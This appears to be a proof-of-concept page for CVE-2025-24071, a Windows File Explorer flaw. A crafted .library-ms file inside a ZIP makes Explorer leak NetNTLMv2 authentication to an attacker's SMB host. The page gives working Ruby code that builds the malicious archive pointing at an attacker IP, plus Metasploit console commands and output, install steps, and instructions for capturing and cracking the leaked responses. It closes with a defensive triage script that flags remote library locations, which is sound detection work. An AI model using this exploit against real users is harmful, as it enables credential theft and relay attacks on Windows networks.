POC details: d51277af871225be26aa4542767bb2e42512b3c9

Source
Related vulnerability
Title: Microsoft Windows File Explorer information disclosure vulnerability (CVE-2025-24071)
Description: Microsoft Windows File Explorer is a file manager application from the US company Microsoft. Microsoft Windows File Explorer has an information disclosure vulnerability; an attacker can exploit it to obtain sensitive information. The following products and versions are affected: Windows 10 Version 1809 for 32-bit Systems, Windows 10 Version 1809 for x64-based Systems, Windows Server 2019, Windows Server
Description
CVE-2025-24071
Introduction
# Blackash-CVE-2025-24071

# CVE-2025-24071: NTLM Hash Leak via .library-ms File, Metasploit Module 🚨

# Description

Exposure of sensitive information to an unauthorized actor in Windows File Explorer allows an unauthorized attacker to perform spoofing over a network.

# Metrics

CNA: Microsoft Corporation. Base score: 6.5 MEDIUM 🟠. Vector: `CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N`

# Overview

The vulnerability is triggered when a user extracts a ZIP archive that contains a specially crafted `.library-ms` file. A `.library-ms` file is an XML Windows Library description; when the extracted file lands in a folder that Explorer is displaying, Explorer parses it and resolves the location in its `<simpleLocation><url>` element. If that location is a UNC path on an attacker-controlled host, Windows opens an SMB connection to it and authenticates with the current user's credentials, which hands the attacker a NetNTLMv2 challenge/response for that user. That is not the NT hash itself: it can be cracked offline or relayed, but not used directly for pass-the-hash. The only interaction required is the extraction, which is why the CVSS vector carries `UI:R`; the user never has to open the file.

Two caveats: the victim must be able to reach the attacker's host on TCP/445, which perimeter firewalls and most ISPs block, so the technique is mainly useful on internal networks; and Microsoft fixed the behaviour in the March 2025 security updates, so a patched Explorer no longer connects on extraction.

This Metasploit module:

1. Generates a malicious `.library-ms` file pointing at `\\ATTACKER_IP\SHARE_NAME`.
2. Packs it into a ZIP archive.
3. Relies on Metasploit's existing SMB capture server (`auxiliary/server/capture/smb`) to collect the NetNTLMv2 responses; it does not start that server itself.
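Steps 1 and 2 in plain Ruby, as an added example that is not the Blackash module's own code: the XML is the minimal Windows Library description (namespace and element names as Windows writes them; the `name`/`iconReference` values are the stock ones and are not what matters), and the archive is written by a small stored-only ZIP writer so no gems are needed. The `192.168.1.162` / `shared` / `malicious.library-ms` values mirror the README's option defaults and are placeholders.

```ruby
# Added example, not the Blackash module's own code: build the .library-ms
# payload and package it as a ZIP without any gems. The XML below is the
# minimal Windows Library description; ATTACKER_IP / SHARE_NAME / LIBRARY_NAME
# are placeholders, as in the README.
require 'zlib'

LIBRARY_NS = 'http://schemas.microsoft.com/windows/2009/library'.freeze

# Library description whose single location is the UNC path Explorer will
# resolve (and authenticate to) when it renders the extracted library.
def build_library_ms(unc_path)
  <<~XML
    <?xml version="1.0" encoding="UTF-8"?>
    <libraryDescription xmlns="#{LIBRARY_NS}">
      <name>@shell32.dll,-34575</name>
      <version>6</version>
      <isLibraryPinned>true</isLibraryPinned>
      <iconReference>imageres.dll,-1003</iconReference>
      <searchConnectorDescriptionList>
        <searchConnectorDescription>
          <isDefaultSaveLocation>true</isDefaultSaveLocation>
          <simpleLocation>
            <url>#{unc_path}</url>
          </simpleLocation>
        </searchConnectorDescription>
      </searchConnectorDescriptionList>
    </libraryDescription>
  XML
end

# Minimal ZIP writer: every entry is "stored" (method 0), followed by a central
# directory and the end-of-central-directory record. Enough for Explorer, 7-Zip
# and unzip; no ZIP64, no data descriptors, fixed 1980-01-01 timestamps.
def build_zip(entries)
  local   = ''.b
  central = ''.b
  entries.each do |name, data|
    name = name.b
    data = data.b
    crc    = Zlib.crc32(data)
    offset = local.bytesize
    # local file header: sig, version needed (2.0), flags, method, time, date,
    # crc32, compressed size, uncompressed size, name length, extra length
    local << ["PK\x03\x04", 20, 0, 0, 0, 0x21, crc, data.bytesize, data.bytesize,
              name.bytesize, 0].pack('a4v5V3v2') << name << data
    # central directory header: the same fields plus version made by, comment
    # length, disk number, internal/external attributes, local header offset
    central << ["PK\x01\x02", 20, 20, 0, 0, 0, 0x21, crc, data.bytesize, data.bytesize,
                name.bytesize, 0, 0, 0, 0, 0, offset].pack('a4v6V3v5V2') << name
  end
  eocd = ["PK\x05\x06", 0, 0, entries.size, entries.size,
          central.bytesize, local.bytesize, 0].pack('a4v4V2v')
  local + central + eocd
end

# Mirrors the module's ATTACKER_IP / SHARE_NAME / LIBRARY_NAME options.
def build_exploit_zip(attacker_ip, share_name, library_name = 'malicious.library-ms')
  unc = "\\\\#{attacker_ip}\\#{share_name}"
  build_zip(library_name => build_library_ms(unc))
end

# ruby build_library_zip.rb exploit.zip 192.168.1.162 shared
if __FILE__ == $PROGRAM_NAME && ARGV.size == 3
  out, ip, share = ARGV
  File.binwrite(out, build_exploit_zip(ip, share))
  puts "wrote #{out}"
end
```

The writer deliberately stores rather than deflates: compression buys nothing for a file this small and a stored entry is trivially inspectable with a hex editor, which is useful when you want to confirm exactly what the target will receive.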

```
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMM                MMMMMMMMMM
MMMN$                           vMMMM
MMMNl  MMMMM             MMMMM  JMMMM
MMMNl  MMMMMMMN       NMMMMMMM  JMMMM
MMMNl  MMMMMMMMMNmmmNMMMMMMMMM  JMMMM
MMMNI  MMMMMMMMMMMMMMMMMMMMMMM  jMMMM
MMMNI  MMMMMMMMMMMMMMMMMMMMMMM  jMMMM
MMMNI  MMMMM   MMMMMMM   MMMMM  jMMMM
MMMNI  MMMMM   MMMMMMM   MMMMM  jMMMM
MMMNI  MMMNM   MMMMMMM   MMMMM  jMMMM
MMMNI  WMMMM   MMMMMMM   MMMM#  JMMMM
MMMMR  ?MMNM             MMMMM .dMMMM
MMMMNm `?MMM             MMMM` dMMMMM
MMMMMMN  ?MM             MM?  NMMMMMN
MMMMMMMMNe                 JMMMMMNMMM
MMMMMMMMMMNm,            eMMMMMNMMNMM
MMMMNNMNMMMMMNx        MMMMMMNMMNMMNM
MMMMMMMMNMMNMMMMm+..+MMNMMNMNMMNMMNMM
        https://metasploit.com


       =[ metasploit v6.4.64-dev                          ]
+ -- --=[ 2519 exploits - 1296 auxiliary - 431 post       ]
+ -- --=[ 1616 payloads - 49 encoders - 13 nops           ]
+ -- --=[ 9 evasion                                       ]

Metasploit Documentation: https://docs.metasploit.com/

msf6 > use auxiliary/server/ntlm_hash_leak
msf6 auxiliary(server/ntlm_hash_leak) > set ATTACKER_IP 192.168.1.1
ATTACKER_IP => 192.168.1.1
msf6 auxiliary(server/ntlm_hash_leak) > set FILENAME exploit.zip
FILENAME => exploit.zip
msf6 auxiliary(server/ntlm_hash_leak) > set LIBRARY_NAME malicious.library-ms
LIBRARY_NAME => malicious.library-ms
msf6 auxiliary(server/ntlm_hash_leak) > set SHARE_NAME shared
SHARE_NAME => shared
msf6 auxiliary(server/ntlm_hash_leak) > run
[*] Malicious ZIP file created: exploit.zip
[*] Host the file and wait for the victim to extract it.
[*] Ensure you have an SMB capture server running to collect NTLM hashes.
[*] Auxiliary module execution completed
```

# Installation:

1. Clone the repository:

```
git clone https://github.com/B1ack4sh/Blackash-CVE-2025-24071.git
cd Blackash-CVE-2025-24071
```

2. Make the module visible to Metasploit. The `use auxiliary/server/ntlm_hash_leak` path used below means the file has to live at `auxiliary/server/ntlm_hash_leak.rb` inside a module tree that msfconsole loads; the usual place for a third-party module is `~/.msf4/modules/`, so copy `CVE-2025-24071.rb` to `~/.msf4/modules/auxiliary/server/ntlm_hash_leak.rb` (creating the directories if needed) and run `reload_all` in msfconsole, or restart it.

# Usage:

1. Load the module:

```
use auxiliary/server/ntlm_hash_leak
```

2. Set the required options:

```
set ATTACKER_IP 192.168.1.162           # Replace with your IP address
set FILENAME exploit.zip                # Name of the malicious ZIP file
set LIBRARY_NAME malicious.library-ms   # Name of the .library-ms file
set SHARE_NAME shared                   # SMB share name
```

3. Run the module:

```
run
```

4. The module generates the malicious ZIP file (exploit.zip) on the attacker machine.
5. Before delivering it, start Metasploit's SMB capture server on the address the `.library-ms` file points to, so the victim's authentication attempt has something to answer it. The capture module needs TCP/445 free on the attacker host, so stop any local smbd first and run msfconsole with enough privilege to bind the port:

```
use auxiliary/server/capture/smb
set SRVHOST 192.168.1.162  # Same as ATTACKER_IP
run
```

6. Host or send exploit.zip to the target and wait for the user to extract it. Each extraction shows up in the capture module as a NetNTLMv2 challenge/response for the extracting user, printed in a form that `hashcat -m 5600` or John can crack offline (set `JOHNPWFILE` on the capture module to have it written to a file). The victim must be able to reach the attacker's address on TCP/445; many ISPs and perimeter firewalls drop it, which is why this is mostly an internal-network technique.
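The defender's side of the same mechanism, as an added example that is not part of the Blackash module or of any Microsoft tooling: a `.library-ms` file is only dangerous because one of its `<url>` locations names a host Windows must authenticate to, so a triage check is "does any location in this library point at a remote host?". The two sample documents are constructed for this example; the only real identifier in them is the Documents known-folder GUID that a legitimate library uses.

```ruby
# Added example, not part of the Blackash module or of any Microsoft tooling:
# defender-side triage for .library-ms content. Flags every <url> that is a
# UNC path or a scheme://host URL, i.e. a location that would make Explorer
# open an outbound (authenticating) connection. Samples below are constructed.

LOCAL_HOSTS = %w[localhost 127.0.0.1 ::1 . ?].freeze

# Pull every <url> body out of a library description. A regex rather than a
# full XML parser keeps this dependency-free; it copes with whitespace and
# CDATA but not with entity-encoded values, so a document that does not look
# like a plain library description should be treated as suspicious as well.
def library_urls(xml)
  xml.scan(%r{<url>\s*(?:<!\[CDATA\[)?(.*?)(?:\]\]>)?\s*</url>}mi).flatten.map(&:strip)
end

# Host a location would make Windows connect to, or nil when it is local
# (drive path, knownfolder:{...}, shell:..., \\?\ and \\.\ device paths).
def remote_host(location)
  host =
    if location =~ %r{\A\\\\([^\\]+)}                        # \\host\share
      Regexp.last_match(1)
    elsif location =~ %r{\A[a-z][a-z0-9+.-]*://([^/\\?#]+)}i # file://host/..., http://host/...
      Regexp.last_match(1)
    end
  return nil if host.nil?
  LOCAL_HOSTS.include?(host.downcase) ? nil : host
end

# Every location in the document that would trigger an outbound connection.
def suspicious_locations(xml)
  library_urls(xml).each_with_object([]) do |u, hits|
    h = remote_host(u)
    hits << { url: u, host: h } if h
  end
end

# Constructed samples: the first mirrors what the module generates, the second
# is what a legitimate "Documents" library looks like (known-folder GUID plus
# a local path), which must not be flagged.
SAMPLE_MALICIOUS = <<~'XML'
  <?xml version="1.0" encoding="UTF-8"?>
  <libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
    <searchConnectorDescriptionList>
      <searchConnectorDescription>
        <simpleLocation><url>\\192.168.1.162\shared</url></simpleLocation>
      </searchConnectorDescription>
    </searchConnectorDescriptionList>
  </libraryDescription>
XML

SAMPLE_BENIGN = <<~'XML'
  <?xml version="1.0" encoding="UTF-8"?>
  <libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
    <searchConnectorDescriptionList>
      <searchConnectorDescription>
        <simpleLocation><url>knownfolder:{FDD39AD0-238F-46AF-ADB4-6C85480369C7}</url></simpleLocation>
      </searchConnectorDescription>
      <searchConnectorDescription>
        <simpleLocation><url>C:\Users\Public\Documents</url></simpleLocation>
      </searchConnectorDescription>
    </searchConnectorDescriptionList>
  </libraryDescription>
XML

if __FILE__ == $PROGRAM_NAME
  [SAMPLE_MALICIOUS, SAMPLE_BENIGN].each do |doc|
    hits = suspicious_locations(doc)
    puts hits.empty? ? 'clean' : "REMOTE: #{hits.map { |h| "#{h[:url]} (#{h[:host]})" }.join(', ')}"
  end
end
```

When scanning archives in transit, select entries whose name ends in `.library-ms` (case-insensitively; Explorer keys on the extension) and run this over their contents. Any hit is worth blocking outright: a library description has no legitimate reason to reference a host outside the organisation, and `http://` locations are flagged too because Windows can satisfy a library location over WebDAV.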

# Disclaimer ⚠️

For educational and research purposes only. Use only against systems you own or have permission to test.
File snapshot

```
[4.0K] /data/pocs/d51277af871225be26aa4542767bb2e42512b3c9
├── [2.9K] CVE-2025-24071.rb
└── [3.5K] README.md

0 directories, 2 files
```